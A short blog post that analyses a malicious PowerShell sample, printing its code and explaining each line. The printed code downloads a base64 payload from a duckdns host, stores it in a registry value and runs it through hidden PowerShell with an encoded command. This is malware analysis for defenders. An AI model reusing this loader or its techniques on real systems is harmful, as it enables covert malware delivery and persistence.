Analysis Malicious Powershell Part 2

Analysis Malicious Powershell Part 2 Skip to main content Analysis Malicious Powershell Part 2 By Diyar Saadi | WIN32 July 15, 2025 In this article, we will analyze another PowerShell file that is used to download and run malware. Sample Link : https://bazaar.abuse.ch/sample/cf0aea3ef14b4587489a9163ee8840f2e388fd0f928f9d5f60d31582a69a9d1f/ Malicious Powershell Code : #$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt" #$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1" #$webClient = New-Object System.Net.WebClient #$base64Code = $webClient.DownloadString($url) #Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String #$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt")); Start-Process powershell -WindowStyle Hidden -ArgumentList "-ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA= Malicious Powershell Analysis: 1- Malware Developer declared a variable as url to download encrypted base64 file : #$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt" . 2- Malware Developer declared a variable as url to download encrypted base64 Powershell file : #$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1" . 3- Malware Developer setup the webclient object to interact with a url's : #$webClient = New-Object System.Net.WebClient . 4- Malware Developer declare a variable to download the encrypted base64 and ps1 file : #$base64Code = $webClient.DownloadString($url). 5- Malware Developer store encoded base64 into the registry key : # Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String. 6- Malware Developer Download encrypted base64 file : #$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt")); 7- Malware Developer execute the encoded base64 code through a Powershell : Start-Process powershell -WindowStyle Hidden -ArgumentList "-ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA= Comments Post a Comment